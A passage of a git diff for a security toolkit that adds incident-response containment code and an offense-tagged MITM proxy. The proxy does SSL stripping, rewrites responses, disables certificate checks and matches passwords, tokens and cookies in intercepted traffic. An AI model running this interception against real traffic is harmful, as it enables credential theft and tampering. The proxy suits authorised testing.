incident_id, timestamp, event, source, details=None): + """Add an event to the incident timeline.""" + timeline = self._load_timeline(incident_id) + entry = { + 'timestamp': timestamp, + 'event': event, + 'source': source, + 'details': details or '', + } + timeline.append(entry) + # Sort chronologically + timeline.sort(key=lambda e: e.get('timestamp', '')) + self._save_timeline(incident_id, timeline) + return entry + + def get_timeline(self, incident_id): + """Get the full chronological timeline for an incident.""" + return self._load_timeline(incident_id) + + def auto_build_timeline(self, incident_id): + """Automatically build timeline from collected evidence by parsing timestamps.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + evidence_files = self.list_evidence(incident_id) + events_added = 0 + edir = self._evidence_dir(incident_id) + + # Timestamp patterns + patterns = [ + # ISO 8601 + (r'(\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}:\d{2})', '%Y-%m-%dT%H:%M:%S'), + # Syslog + (r'([A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})', None), + # Windows Event Log + (r'Date:\s+(\d{1,2}/\d{1,2}/\d{4}\s+\d{1,2}:\d{2}:\d{2}\s*[AP]M)', '%m/%d/%Y %I:%M:%S %p'), + ] + + for ef in evidence_files: + filepath = edir / ef['filename'] + try: + content = filepath.read_text(encoding='utf-8', errors='replace') + except Exception: + continue + + lines = content.splitlines() + for line in lines[:500]: # limit to first 500 lines per file + for pattern, fmt in patterns: + match = re.search(pattern, line) + if match: + ts_str = match.group(1) + try: + if fmt: + ts_str = ts_str.replace('T', ' ') + dt = datetime.strptime(ts_str.strip(), fmt.replace('T', ' ')) + ts_iso = dt.isoformat() + else: + # Syslog format — use current year + year = datetime.now().year + dt = datetime.strptime(f'{year} {ts_str}', '%Y %b %d %H:%M:%S') + ts_iso = dt.isoformat() + except ValueError: + continue + + # Extract a useful event description from the line + event_text = line[match.end():].strip()[:200] + if event_text: + self.add_timeline_event( + incident_id, ts_iso, + event_text, + ef['filename'], + f'Auto-extracted from {ef["filename"]}') + events_added += 1 + break # only match first pattern per line + + if events_added >= 200: + break + if events_added >= 200: + break + + self.add_timeline_event(incident_id, self._now_iso(), + f'Auto-built timeline: {events_added} events extracted', + 'system', f'Parsed {len(evidence_files)} evidence files') + + return { + 'events_added': events_added, + 'evidence_parsed': len(evidence_files), + 'total_timeline_events': len(self._load_timeline(incident_id)), + } + + # ── Containment ────────────────────────────────────────────── + + def contain_host(self, incident_id, host, actions): + """Execute containment actions against a host/IP. + + actions: list of strings from ['block_ip', 'kill_process', 'disable_user', 'isolate_network'] + """ + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + results = [] + + for action in actions: + if action == 'block_ip': + if _is_win: + success, out = self._run_cmd( + f'netsh advfirewall firewall add rule name="AUTARCH-IR-Block-{host}" ' + f'dir=in action=block remoteip={host}') + else: + success, out = self._run_cmd(f'iptables -A INPUT -s {host} -j DROP') + results.append({ + 'action': 'block_ip', + 'target': host, + 'success': success, + 'output': out, + }) + + elif action == 'kill_process': + # host here is treated as PID or process name + if _is_win: + success, out = self._run_cmd(f'taskkill /F /PID {host} 2>nul || taskkill /F /IM {host} 2>nul') + else: + success, out = self._run_cmd(f'kill -9 {host} 2>/dev/null || pkill -9 {host} 2>/dev/null') + results.append({ + 'action': 'kill_process', + 'target': host, + 'success': success, + 'output': out, + }) + + elif action == 'disable_user': + if _is_win: + success, out = self._run_cmd(f'net user {host} /active:no') + else: + success, out = self._run_cmd(f'usermod -L {host} 2>/dev/null; passwd -l {host} 2>/dev/null') + results.append({ + 'action': 'disable_user', + 'target': host, + 'success': success, + 'output': out, + }) + + elif action == 'isolate_network': + if _is_win: + cmds = [ + f'netsh advfirewall firewall add rule name="AUTARCH-IR-Isolate-In" dir=in action=block remoteip=any', + f'netsh advfirewall firewall add rule name="AUTARCH-IR-Isolate-Out" dir=out action=block remoteip=any', + ] + else: + cmds = [ + 'iptables -P INPUT DROP', + 'iptables -P OUTPUT DROP', + 'iptables -P FORWARD DROP', + # Allow loopback + 'iptables -A INPUT -i lo -j ACCEPT', + 'iptables -A OUTPUT -o lo -j ACCEPT', + ] + all_ok = True + combined = [] + for cmd in cmds: + s, o = self._run_cmd(cmd) + combined.append(o) + if not s: + all_ok = False + results.append({ + 'action': 'isolate_network', + 'target': host, + 'success': all_ok, + 'output': '\n'.join(combined), + }) + + # Update incident status to contained + if incident['status'] in ('open', 'investigating'): + incident['status'] = 'contained' + incident['updated'] = self._now_iso() + self._save_incident(incident) + + # Log all actions + action_summary = ', '.join(f'{r["action"]}:{r["target"]}={"OK" if r["success"] else "FAIL"}' for r in results) + self.add_timeline_event(incident_id, self._now_iso(), + f'Containment actions executed', 'containment', + action_summary) + + # Store as evidence + self.add_evidence(incident_id, 'containment_actions', + json.dumps(results, indent=2), evidence_type='containment') + + return {'results': results, 'status': incident.get('status')} + + # ── Reporting ──────────────────────────────────────────────── + + def generate_report(self, incident_id): + """Generate a comprehensive post-incident report.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + timeline = self._load_timeline(incident_id) + evidence = self.list_evidence(incident_id) + playbook = IR_PLAYBOOKS.get(incident['type'], {}) + steps = playbook.get('steps', []) + progress = incident.get('playbook_progress', []) + + completed_steps = sum(1 for p in progress if p) + total_steps = len(steps) + + # Build report sections + report = { + 'title': f'Incident Report: {incident["name"]}', + 'incident_id': incident['id'], + 'generated_at': self._now_iso(), + 'executive_summary': { + 'incident_name': incident['name'], + 'incident_type': incident['type'], + 'severity': incident['severity'], + 'status': incident['status'], + 'created': incident['created'], + 'closed': incident.get('closed'), + 'duration': self._calc_duration(incident['created'], incident.get('closed')), + 'description': incident['description'], + }, + 'timeline': timeline, + 'timeline_summary': f'{len(timeline)} events recorded', + 'evidence_summary': { + 'total_evidence': len(evidence), + 'evidence_list': [{'name': e['name'], 'size': e['size'], + 'collected_at': e['collected_at']} for e in evidence], + }, + 'playbook_progress': { + 'playbook_name': playbook.get('name', 'N/A'), + 'completed_steps': completed_steps, + 'total_steps': total_steps, + 'completion_pct': int(completed_steps / total_steps * 100) if total_steps > 0 else 0, + 'steps': [], + }, + 'actions_taken': [], + 'resolution': incident.get('resolution_notes', ''), + 'recommendations': self._generate_recommendations(incident['type']), + 'lessons_learned': [], + } + + for i, step in enumerate(steps): + done = progress[i] if i < len(progress) else False + report['playbook_progress']['steps'].append({ + 'step': i + 1, + 'title': step['title'], + 'completed': done, + }) + + # Extract containment actions from timeline + for event in timeline: + if event.get('source') in ('containment', 'playbook'): + report['actions_taken'].append({ + 'timestamp': event['timestamp'], + 'action': event['event'], + 'details': event.get('details', ''), + }) + + return report + + def _calc_duration(self, start_str, end_str): + """Calculate human-readable duration between two ISO timestamps.""" + try: + start = datetime.fromisoformat(start_str.replace('Z', '+00:00')) + if end_str: + end = datetime.fromisoformat(end_str.replace('Z', '+00:00')) + else: + end = datetime.now(timezone.utc) + delta = end - start + hours = int(delta.total_seconds() // 3600) + minutes = int((delta.total_seconds() % 3600) // 60) + if hours > 24: + days = hours // 24 + hours = hours % 24 + return f'{days}d {hours}h {minutes}m' + return f'{hours}h {minutes}m' + except Exception: + return 'unknown' + + def _generate_recommendations(self, incident_type): + """Generate post-incident recommendations based on incident type.""" + recs = { + 'ransomware': [ + 'Implement network segmentation to limit lateral movement', + 'Deploy endpoint detection and response (EDR) on all systems', + 'Implement immutable backups with offline/offsite copies', + 'Enable application whitelisting on critical servers', + 'Conduct regular phishing awareness training', + 'Implement email attachment sandboxing', + ], + 'data_breach': [ + 'Deploy Data Loss Prevention (DLP) tools', + 'Implement database activity monitoring', + 'Enable multi-factor authentication on all accounts', + 'Encrypt sensitive data at rest and in transit', + 'Implement least-privilege access controls', + 'Conduct regular access reviews', + ], + 'insider_threat': [ + 'Implement user behavior analytics (UBA)', + 'Enable comprehensive audit logging', + 'Enforce separation of duties', + 'Implement DLP with content-aware policies', + 'Conduct regular access certification reviews', + 'Establish clear data handling policies', + ], + 'ddos': [ + 'Subscribe to a DDoS mitigation service', + 'Implement rate limiting at all network layers', + 'Deploy a web application firewall (WAF)', + 'Configure SYN flood protection on all servers', + 'Implement anycast DNS for resilience', + 'Create and test DDoS runbooks quarterly', + ], + 'account_compromise': [ + 'Enforce MFA on all user accounts', + 'Implement conditional access policies', + 'Deploy password manager for the organization', + 'Enable login anomaly detection', + 'Implement session timeout policies', + 'Conduct regular credential audits', + ], + 'malware': [ + 'Deploy next-gen antivirus with behavioral detection', + 'Implement application whitelisting', + 'Enable automatic OS and application patching', + 'Restrict macro execution in Office documents', + 'Implement email gateway scanning', + 'Deploy network-level malware detection', + ], + 'phishing': [ + 'Deploy advanced email gateway with AI detection', + 'Implement DMARC, DKIM, and SPF for email authentication', + 'Conduct regular phishing simulation exercises', + 'Enable browser isolation for email links', + 'Implement URL rewriting and time-of-click protection', + 'Establish easy phishing report button for users', + ], + 'unauthorized_access': [ + 'Implement zero-trust network architecture', + 'Deploy intrusion detection/prevention systems', + 'Enable comprehensive authentication logging', + 'Conduct regular vulnerability assessments', + 'Implement network access control (NAC)', + 'Deploy privileged access management (PAM)', + ], + } + return recs.get(incident_type, ['Review and update security controls']) + + def export_incident(self, incident_id, fmt='json'): + """Export the full incident package as JSON.""" + incident = self.get_incident(incident_id) + if 'error' in incident: + return incident + + # Include evidence content + edir = self._evidence_dir(incident_id) + evidence_data = [] + for ef in incident.get('evidence', []): + filepath = edir / ef['filename'] + try: + content = filepath.read_text(encoding='utf-8', errors='replace') + except Exception: + content = '[Could not read file]' + evidence_data.append({ + 'filename': ef['filename'], + 'name': ef['name'], + 'size': ef['size'], + 'collected_at': ef['collected_at'], + 'content': content, + }) + + export = { + 'incident': incident, + 'evidence_data': evidence_data, + 'report': self.generate_report(incident_id), + 'exported_at': self._now_iso(), + } + return export + + +# ── Singleton ──────────────────────────────────────────────────── + +_instance = None + + +def get_incident_resp(): + """Get or create singleton IncidentResponse instance.""" + global _instance + if _instance is None: + _instance = IncidentResponse() + return _instance + + +# ── CLI Runner ─────────────────────────────────────────────────── + +def run(): + """CLI interface for incident response module.""" + ir = get_incident_resp() + + while True: + clear_screen() + display_banner() + print(f'\n{Colors.CYAN}{"=" * 50}') + print(f' INCIDENT RESPONSE') + print(f'{"=" * 50}{Colors.RESET}\n') + + incidents = ir.list_incidents() + open_count = sum(1 for i in incidents if i['status'] != 'closed') + print(f' Active incidents: {open_count}\n') + + print(f' {Colors.GREEN}1{Colors.RESET} Create Incident') + print(f' {Colors.GREEN}2{Colors.RESET} List Incidents') + print(f' {Colors.GREEN}3{Colors.RESET} View Incident') + print(f' {Colors.GREEN}4{Colors.RESET} Run Playbook') + print(f' {Colors.GREEN}5{Colors.RESET} Collect Evidence') + print(f' {Colors.GREEN}6{Colors.RESET} Sweep IOCs') + print(f' {Colors.GREEN}7{Colors.RESET} Generate Report') + print(f' {Colors.RED}0{Colors.RESET} Back\n') + + choice = input(f'{Colors.CYAN}>{Colors.RESET} ').strip() + + if choice == '0': + break + + elif choice == '1': + print(f'\n{Colors.CYAN}Create New Incident{Colors.RESET}') + name = input(' Name: ').strip() + if not name: + continue + print(f' Types: {", ".join(INCIDENT_TYPES)}') + itype = input(' Type: ').strip() + print(f' Severity: {", ".join(SEVERITY_LEVELS)}') + severity = input(' Severity: ').strip() + desc = input(' Description: ').strip() + result = ir.create_incident(name, itype, severity, desc) + if 'error' in result: + print(f'\n {Colors.RED}Error: {result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.GREEN}Created incident: {result["id"]}{Colors.RESET}') + input('\n Press Enter...') + + elif choice == '2': + print(f'\n{Colors.CYAN}Incidents{Colors.RESET}\n') + for inc in incidents: + sev_color = { + 'critical': Colors.RED, 'high': Colors.YELLOW, + 'medium': Colors.CYAN, 'low': Colors.GREEN, + }.get(inc['severity'], Colors.WHITE) + print(f' {inc["id"]} | {inc["name"][:30]:30s} | ' + f'{sev_color}{inc["severity"]:8s}{Colors.RESET} | ' + f'{inc["status"]:12s} | {inc["type"]}') + if not incidents: + print(' No incidents found.') + input('\n Press Enter...') + + elif choice == '3': + iid = input('\n Incident ID: ').strip() + inc = ir.get_incident(iid) + if 'error' in inc: + print(f'\n {Colors.RED}{inc["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.BOLD}{inc["name"]}{Colors.RESET}') + print(f' Type: {inc["type"]} | Severity: {inc["severity"]} | Status: {inc["status"]}') + print(f' Created: {inc["created"]}') + print(f' Description: {inc.get("description", "")}') + print(f'\n Timeline events: {len(inc.get("timeline", []))}') + print(f' Evidence items: {len(inc.get("evidence", []))}') + progress = inc.get('playbook_progress', []) + done = sum(1 for p in progress if p) + print(f' Playbook progress: {done}/{len(progress)} steps') + input('\n Press Enter...') + + elif choice == '4': + iid = input('\n Incident ID: ').strip() + inc = ir.get_incident(iid) + if 'error' in inc: + print(f'\n {Colors.RED}{inc["error"]}{Colors.RESET}') + input('\n Press Enter...') + continue + pb = ir.get_playbook(inc['type']) + if 'error' in pb: + print(f'\n {Colors.RED}{pb["error"]}{Colors.RESET}') + input('\n Press Enter...') + continue + print(f'\n {Colors.CYAN}Playbook: {pb["name"]}{Colors.RESET}\n') + progress = inc.get('playbook_progress', []) + for i, step in enumerate(pb['steps']): + done = progress[i] if i < len(progress) else False + mark = f'{Colors.GREEN}[X]{Colors.RESET}' if done else f'{Colors.RED}[ ]{Colors.RESET}' + auto_tag = f' {Colors.YELLOW}[AUTO]{Colors.RESET}' if step.get('automated') else '' + print(f' {mark} {i}: {step["title"]}{auto_tag}') + step_idx = input('\n Step # to run (or Enter to skip): ').strip() + if step_idx.isdigit(): + auto = input(' Auto-execute commands? (y/n): ').strip().lower() == 'y' + result = ir.run_playbook_step(iid, int(step_idx), auto=auto) + if 'error' in result: + print(f'\n {Colors.RED}{result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.GREEN}Step completed: {result["title"]}{Colors.RESET}') + if result.get('output'): + print(f'\n{result["output"][:500]}') + input('\n Press Enter...') + + elif choice == '5': + iid = input('\n Incident ID: ').strip() + print(f'\n Evidence types: {", ".join(EVIDENCE_TYPES)}') + etype = input(' Type: ').strip() + result = ir.collect_evidence(iid, etype) + if 'error' in result: + print(f'\n {Colors.RED}{result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.GREEN}Collected: {result["name"]} ({result["size"]} bytes){Colors.RESET}') + if result.get('preview'): + print(f'\n Preview:\n{result["preview"][:300]}') + input('\n Press Enter...') + + elif choice == '6': + iid = input('\n Incident ID: ').strip() + print('\n Enter IOCs (comma-separated):') + ips = input(' IPs: ').strip() + domains = input(' Domains: ').strip() + hashes = input(' Hashes: ').strip() + iocs = { + 'ips': [x.strip() for x in ips.split(',') if x.strip()], + 'domains': [x.strip() for x in domains.split(',') if x.strip()], + 'hashes': [x.strip() for x in hashes.split(',') if x.strip()], + } + result = ir.sweep_iocs(iid, iocs) + if 'error' in result: + print(f'\n {Colors.RED}{result["error"]}{Colors.RESET}') + else: + print(f'\n {Colors.CYAN}Swept {result["total_iocs"]} IOCs, ' + f'found {result["matches_found"]} matches{Colors.RESET}') + for m in result.get('matches', []): + sev_color = Colors.RED if m['severity'] == 'critical' else Colors.YELLOW + print(f' {sev_color}[{m["severity"].upper()}]{Colors.RESET} ' + f'{m["type"]}: {m["ioc"]} in {m["found_in"]}') + input('\n Press Enter...') + + elif choice == '7': + iid = input('\n Incident ID: ').strip() + report = ir.generate_report(iid) + if 'error' in report: + print(f'\n {Colors.RED}{report["error"]}{Colors.RESET}') + else: + es = report['executive_summary'] + print(f'\n {Colors.BOLD}{report["title"]}{Colors.RESET}') + print(f' Type: {es["incident_type"]} | Severity: {es["severity"]}') + print(f' Status: {es["status"]} | Duration: {es["duration"]}') + print(f' Timeline: {report["timeline_summary"]}') + pp = report['playbook_progress'] + print(f' Playbook: {pp["completed_steps"]}/{pp["total_steps"]} steps ({pp["completion_pct"]}%)') + print(f' Evidence: {report["evidence_summary"]["total_evidence"]} items') + print(f' Actions taken: {len(report["actions_taken"])}') + print(f'\n {Colors.CYAN}Recommendations:{Colors.RESET}') + for r in report.get('recommendations', []): + print(f' - {r}') + input('\n Press Enter...') diff --git a/modules/mitm_proxy.py b/modules/mitm_proxy.py new file mode 100644 index 0000000..53aaffb --- /dev/null +++ b/modules/mitm_proxy.py @@ -0,0 +1,1147 @@ +""" +AUTARCH MITM Proxy + +HTTP/HTTPS interception proxy with SSL stripping, request/response +modification, traffic logging, WebSocket interception, and upstream chaining. +""" + +import os +import sys +import re +import json +import time +import signal +import socket +import ssl +import threading +import subprocess +import uuid +import http.server +import urllib.request +import urllib.parse +from pathlib import Path +from datetime import datetime +from http.client import HTTPConnection, HTTPSConnection + +# Module metadata +DESCRIPTION = "HTTP(S) interception proxy & traffic analysis" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +sys.path.insert(0, str(Path(__file__).parent.parent)) +from core.banner import Colors, clear_screen, display_banner + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + def find_tool(name): + import shutil + return shutil.which(name) + + +# ── Secret detection patterns ──────────────────────────────────────────── + +SECRET_PATTERNS = [ + (r'(?i)(?:api[_-]?key|apikey)\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})', 'API Key'), + (r'(?i)(?:auth(?:orization)?|bearer)\s*[:=]\s*["\']?([A-Za-z0-9_\-\.]{16,})', 'Auth Token'), + (r'(?i)(?:password|passwd|pwd)\s*[:=]\s*["\']?(\S{4,})', 'Password'), + (r'(?i)(?:secret|client_secret)\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})', 'Secret'), + (r'(?i)(?:token|access_token|refresh_token)\s*[:=]\s*["\']?([A-Za-z0-9_\-\.]{16,})', 'Token'), + (r'(?i)(?:aws_access_key_id)\s*[:=]\s*["\']?(AKIA[A-Z0-9]{16})', 'AWS Key'), + (r'(?i)(?:aws_secret_access_key)\s*[:=]\s*["\']?([A-Za-z0-9/+=]{40})', 'AWS Secret'), + (r'(?i)(sk-[A-Za-z0-9]{32,})', 'OpenAI Key'), + (r'(?i)(ghp_[A-Za-z0-9]{36,})', 'GitHub PAT'), + (r'(?i)(glpat-[A-Za-z0-9_\-]{20,})', 'GitLab PAT'), + (r'(?i)(?:session|sess_id|sessionid)\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})', 'Session ID'), + (r'(?i)(?:cookie)\s*[:=]\s*["\']?(\S{16,})', 'Cookie'), + (r'Authorization:\s*(Basic\s+[A-Za-z0-9+/=]+)', 'Basic Auth Header'), + (r'Authorization:\s*(Bearer\s+[A-Za-z0-9_\-\.]+)', 'Bearer Auth Header'), + (r'(?i)(?:private[_-]?key)\s*[:=]\s*["\']?(\S{16,})', 'Private Key'), + (r'(?i)(eyJ[A-Za-z0-9_\-]+\.eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)', 'JWT Token'), +] + +_COMPILED_SECRETS = [(re.compile(p), label) for p, label in SECRET_PATTERNS] + + +# ── Built-in Proxy Handler ─────────────────────────────────────────────── + +class _ProxyRequestHandler(http.server.BaseHTTPRequestHandler): + """HTTP proxy request handler that logs traffic and applies rules.""" + + # Shared state — set by MITMProxy before starting the server + mitm = None + + def log_message(self, fmt, *args): + """Suppress default stderr logging.""" + pass + + def _get_upstream(self): + """Return (host, port) for upstream proxy or None.""" + if self.mitm and self.mitm._upstream_proxy: + return self.mitm._upstream_proxy + return None + + def _read_body(self): + """Read request body if Content-Length is present.""" + length = self.headers.get('Content-Length') + if length: + try: + return self.rfile.read(int(length)) + except Exception: + return b'' + return b'' + + def _apply_rules(self, method, url, req_headers, req_body, resp_status=None, + resp_headers=None, resp_body=None, phase='request'): + """Apply matching modification rules. Returns modified values.""" + if not self.mitm: + return req_headers, req_body, resp_headers, resp_body, None + + for rule in self.mitm._rules: + if not rule.get('enabled', True): + continue + + # URL match + url_pattern = rule.get('match_url', '') + if url_pattern: + try: + if not re.search(url_pattern, url, re.IGNORECASE): + continue + except re.error: + continue + + # Method match + match_method = rule.get('match_method', '') + if match_method and match_method.upper() != 'ANY': + if method.upper() != match_method.upper(): + continue + + action = rule.get('action', '') + params = rule.get('params', {}) + + if action == 'block': + return req_headers, req_body, resp_headers, resp_body, 'block' + + if action == 'redirect' and phase == 'request': + return req_headers, req_body, resp_headers, resp_body, params.get('target_url', url) + + if action == 'modify_header' and phase == 'request': + header_name = params.get('header_name', '') + header_value = params.get('header_value', '') + if header_name and req_headers is not None: + req_headers[header_name] = header_value + + if action == 'inject_header' and phase == 'response': + header_name = params.get('header_name', '') + header_value = params.get('header_value', '') + if header_name and resp_headers is not None: + resp_headers[header_name] = header_value + + if action == 'modify_body' and phase == 'response': + search = params.get('search', '') + replace = params.get('replace', '') + if search and resp_body is not None: + try: + if isinstance(resp_body, bytes): + resp_body = resp_body.replace( + search.encode('utf-8', errors='replace'), + replace.encode('utf-8', errors='replace') + ) + else: + resp_body = resp_body.replace(search, replace) + except Exception: + pass + + return req_headers, req_body, resp_headers, resp_body, None + + def _handle_request(self, method): + """Handle all HTTP methods.""" + start_time = time.time() + url = self.path + req_body = self._read_body() + + # Convert headers to dict + req_headers = {} + for key in self.headers: + req_headers[key] = self.headers[key] + + # Apply request-phase rules + req_headers, req_body, _, _, action = self._apply_rules( + method, url, req_headers, req_body, phase='request' + ) + + # Handle block action + if action == 'block': + self.send_response(403) + self.send_header('Content-Type', 'text/plain') + self.end_headers() + self.wfile.write(b'Blocked by AUTARCH MITM Proxy') + if self.mitm: + self.mitm._log_traffic(method, url, 403, req_headers, + req_body, {}, b'Blocked', 0, start_time) + return + + # Handle redirect action + if action and action != 'block': + self.send_response(302) + self.send_header('Location', action) + self.end_headers() + if self.mitm: + self.mitm._log_traffic(method, url, 302, req_headers, + req_body, {'Location': action}, b'', 0, start_time) + return + + # SSL strip: rewrite HTTPS URLs to HTTP in the request + if self.mitm and self.mitm._ssl_strip: + url = url.replace('https://', 'http://') + + # Forward the request + try: + parsed = urllib.parse.urlparse(url) + target_host = parsed.hostname or 'localhost' + target_port = parsed.port or (443 if parsed.scheme == 'https' else 80) + target_path = parsed.path + if parsed.query: + target_path += '?' + parsed.query + + upstream = self._get_upstream() + + if upstream: + # Route through upstream proxy + conn = HTTPConnection(upstream[0], upstream[1], timeout=30) + conn.request(method, url, body=req_body if req_body else None, + headers=req_headers) + elif parsed.scheme == 'https': + ctx = ssl.create_default_context() + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + conn = HTTPSConnection(target_host, target_port, timeout=30, + context=ctx) + conn.request(method, target_path, body=req_body if req_body else None, + headers=req_headers) + else: + conn = HTTPConnection(target_host, target_port, timeout=30) + conn.request(method, target_path, body=req_body if req_body else None, + headers=req_headers) + + resp = conn.getresponse() + resp_body = resp.read() + resp_status = resp.status + resp_headers = dict(resp.getheaders()) + + # Apply response-phase rules + _, _, resp_headers, resp_body, _ = self._apply_rules( + method, url, req_headers, req_body, + resp_status=resp_status, resp_headers=resp_headers, + resp_body=resp_body, phase='response' + ) + + # SSL strip: rewrite HTTPS links to HTTP in response body + if self.mitm and self.mitm._ssl_strip and resp_body: + resp_body = resp_body.replace(b'https://', b'http://') + + # Send response back to client + self.send_response(resp_status) + for key, value in resp_headers.items(): + if key.lower() in ('transfer-encoding', 'content-length', + 'content-encoding'): + continue + self.send_header(key, value) + self.send_header('Content-Length', str(len(resp_body))) + self.end_headers() + self.wfile.write(resp_body) + + # Log traffic + if self.mitm: + self.mitm._log_traffic(method, url, resp_status, req_headers, + req_body, resp_headers, resp_body, + len(resp_body), start_time) + + conn.close() + + except Exception as e: + error_msg = f'MITM Proxy Error: {str(e)}'.encode('utf-8') + self.send_response(502) + self.send_header('Content-Type', 'text/plain') + self.send_header('Content-Length', str(len(error_msg))) + self.end_headers() + self.wfile.write(error_msg) + if self.mitm: + self.mitm._log_traffic(method, url, 502, req_headers, + req_body, {}, error_msg, 0, start_time) + + def do_GET(self): + self._handle_request('GET') + + def do_POST(self): + self._handle_request('POST') + + def do_PUT(self): + self._handle_request('PUT') + + def do_DELETE(self): + self._handle_request('DELETE') + + def do_PATCH(self): + self._handle_request('PATCH') + + def do_HEAD(self): + self._handle_request('HEAD') + + def do_OPTIONS(self): + self._handle_request('OPTIONS') + + def do_CONNECT(self): + """Handle CONNECT for HTTPS tunneling.""" + host_port = self.path.split(':') + host = host_port[0] + port = int(host_port[1]) if len(host_port) > 1 else 443 + + self.send_response(200, 'Connection Established') + self.end_headers() + + # Log the CONNECT request + if self.mitm: + self.mitm._log_traffic('CONNECT', self.path, 200, + dict(self.headers), b'', {}, + b'Tunnel established', 0, time.time()) + + +# ── MITM Proxy Core ────────────────────────────────────────────────────── + +class MITMProxy: + """HTTP/HTTPS interception proxy with traffic logging and rule engine.""" + + _instance = None + + def __init__(self): + self._running = False + self._process = None + self._server = None + self._server_thread = None + self._listen_host = '127.0.0.1' + self._listen_port = 8888 + self._upstream_proxy = None + self._ssl_strip = False + self._use_mitmdump = False + + # Rules engine + self._rules = [] + self._next_rule_id = 1 + + # Traffic log + self._traffic = [] + self._traffic_lock = threading.Lock() + self._next_traffic_id = 1 + self._request_count = 0 + + # Certificate storage + data_dir = Path(get_data_dir()) if callable(get_data_dir) else Path(get_data_dir) + self._mitm_dir = data_dir / 'mitm' + self._cert_dir = self._mitm_dir / 'certs' + self._rules_path = self._mitm_dir / 'rules.json' + self._traffic_path = self._mitm_dir / 'traffic.json' + + self._mitm_dir.mkdir(parents=True, exist_ok=True) + self._cert_dir.mkdir(parents=True, exist_ok=True) + + # Load persisted rules + self._load_rules() + + # ── Proxy Lifecycle ────────────────────────────────────────────── + + def start(self, listen_host='127.0.0.1', listen_port=8888, upstream_proxy=None): + """Start the MITM proxy. + + Tries mitmdump first; falls back to built-in proxy. + Returns dict with status info. + """ + if self._running: + return {'success': False, 'error': 'Proxy already running', + 'host': self._listen_host, 'port': self._listen_port} + + self._listen_host = listen_host + self._listen_port = int(listen_port) + + # Parse upstream proxy + if upstream_proxy: + upstream_proxy = upstream_proxy.strip() + if upstream_proxy: + parts = upstream_proxy.replace('http://', '').replace('https://', '') + if ':' in parts: + h, p = parts.rsplit(':', 1) + try: + self._upstream_proxy = (h, int(p)) + except ValueError: + self._upstream_proxy = None + else: + self._upstream_proxy = (parts, 8080) + else: + self._upstream_proxy = None + + # Try mitmdump first + mitmdump_path = find_tool('mitmdump') + if mitmdump_path: + return self._start_mitmdump(mitmdump_path) + + # Fall back to built-in proxy + return self._start_builtin() + + def _start_mitmdump(self, mitmdump_path): + """Start proxy using mitmdump subprocess.""" + cmd = [ + mitmdump_path, + '--listen-host', self._listen_host, + '--listen-port', str(self._listen_port), + '--set', 'flow_detail=0', + '--set', f'confdir={str(self._cert_dir)}', + ] + + if self._upstream_proxy: + cmd.extend(['--mode', f'upstream:http://{self._upstream_proxy[0]}:{self._upstream_proxy[1]}']) + + if self._ssl_strip: + cmd.extend(['--ssl-insecure']) + + try: + self._process = subprocess.Popen( + cmd, + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + creationflags=getattr(subprocess, 'CREATE_NO_WINDOW', 0) + ) + time.sleep(1.0) + + if self._process.poll() is not None: + stderr = self._process.stderr.read().decode('utf-8', errors='replace') + return {'success': False, 'error': f'mitmdump exited: {stderr}'} + + self._running = True + self._use_mitmdump = True + return { + 'success': True, + 'message': f'Proxy started (mitmdump) on {self._listen_host}:{self._listen_port}', + 'host': self._listen_host, + 'port': self._listen_port, + 'engine': 'mitmdump', + 'pid': self._process.pid, + } + except Exception as e: + return {'success': False, 'error': f'Failed to start mitmdump: {str(e)}'} + + def _start_builtin(self): + """Start proxy using built-in HTTP server.""" + try: + _ProxyRequestHandler.mitm = self + + server = http.server.HTTPServer( + (self._listen_host, self._listen_port), + _ProxyRequestHandler + ) + server.timeout = 1 + + self._server = server + self._running = True + self._use_mitmdump = False + + def serve(): + while self._running: + try: + server.handle_request() + except Exception: + if self._running: + continue + break + + self._server_thread = threading.Thread(target=serve, daemon=True, + name='mitm-proxy') + self._server_thread.start() + + return { + 'success': True, + 'message': f'Proxy started (built-in) on {self._listen_host}:{self._listen_port}', + 'host': self._listen_host, + 'port': self._listen_port, + 'engine': 'builtin', + } + except OSError as e: + self._running = False + return {'success': False, 'error': f'Failed to bind {self._listen_host}:{self._listen_port}: {str(e)}'} + except Exception as e: + self._running = False + return {'success': False, 'error': f'Failed to start proxy: {str(e)}'} + + def stop(self): + """Stop the MITM proxy.""" + if not self._running: + return {'success': False, 'error': 'Proxy is not running'} + + self._running = False + + # Kill mitmdump process + if self._process: + try: + self._process.terminate() + self._process.wait(timeout=5) + except Exception: + try: + self._process.kill() + except Exception: + pass + self._process = None + + # Shutdown built-in server + if self._server: + try: + self._server.server_close() + except Exception: + pass + self._server = None + + if self._server_thread: + self._server_thread.join(timeout=3) + self._server_thread = None + + _ProxyRequestHandler.mitm = None + + return {'success': True, 'message': 'Proxy stopped'} + + def is_running(self): + """Check if proxy is active.""" + if self._process: + if self._process.poll() is not None: + self._running = False + self._process = None + return self._running + + def get_status(self): + """Return proxy status information.""" + return { + 'running': self.is_running(), + 'host': self._listen_host, + 'port': self._listen_port, + 'engine': 'mitmdump' if self._use_mitmdump else 'builtin', + 'request_count': self._request_count, + 'traffic_entries': len(self._traffic), + 'rules_count': len(self._rules), + 'ssl_strip': self._ssl_strip, + 'upstream_proxy': f'{self._upstream_proxy[0]}:{self._upstream_proxy[1]}' if self._upstream_proxy else None, + 'pid': self._process.pid if self._process else None, + } + + # ── Certificate Management ─────────────────────────────────────── + + def generate_ca_cert(self): + """Generate a CA certificate for HTTPS interception. + + Uses the cryptography library to create a self-signed 